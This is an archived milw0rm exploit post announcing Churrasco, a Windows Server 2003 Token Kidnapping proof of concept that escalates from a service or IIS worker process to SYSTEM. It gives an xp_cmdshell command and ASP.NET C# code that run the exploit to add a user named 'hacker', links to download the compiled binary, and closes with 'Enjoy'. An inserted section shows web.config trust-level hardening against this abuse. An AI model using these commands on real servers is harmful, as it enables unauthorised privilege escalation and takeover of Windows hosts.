MS Windows 2003 Token Kidnapping Local Exploit PoC
Compiled build: http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009)
From:http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.
Basically, if you can run code under any service in Win2k3 then you can own Windows, because Windows
service accounts can impersonate. Other processes (not services) that can impersonate are the IIS 6 worker processes,
so if you can run code from an ASP.NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services, I would recommend not allowing users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments = " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
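The shared-hosting recommendation above (do not let tenants run this kind of code from ASP) is usually enforced through the ASP.NET trust level. The following two web.config fragments are an added example and not part of the original post: the first is the permissive default, the second the lock-down placed in the server-wide root web.config; the trust element, location/allowOverride and the root config path are real ASP.NET configuration, the choice of Medium as the tenant level is an assumption.

```xml
<!-- Fragment 1, weak (default) setting: Full trust lets any page call
     System.Diagnostics.Process.Start, i.e. launch a binary such as churrasco.exe
     from the worker process that already holds impersonation rights. -->
<configuration>
  <system.web>
    <trust level="Full" />
  </system.web>
</configuration>

<!-- Fragment 2, hardened: placed in the server-wide root web.config
     (%windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config).
     Medium trust withholds the UnmanagedCode SecurityPermission, so
     Process.Start throws a SecurityException in tenant code, and
     allowOverride="false" prevents a site's own web.config from raising
     the level again. Medium is an assumed choice; pick the lowest level
     the hosted applications actually work with. -->
<configuration>
  <location allowOverride="false">
    <system.web>
      <trust level="Medium" originUrl="" />
    </system.web>
  </location>
</configuration>
```

This only contains managed tenant code; the worker process identity still holds the impersonation privilege, so it limits who can launch such a binary rather than fixing the token handling the presentation describes.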
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
# milw0rm.com [2008-10-08]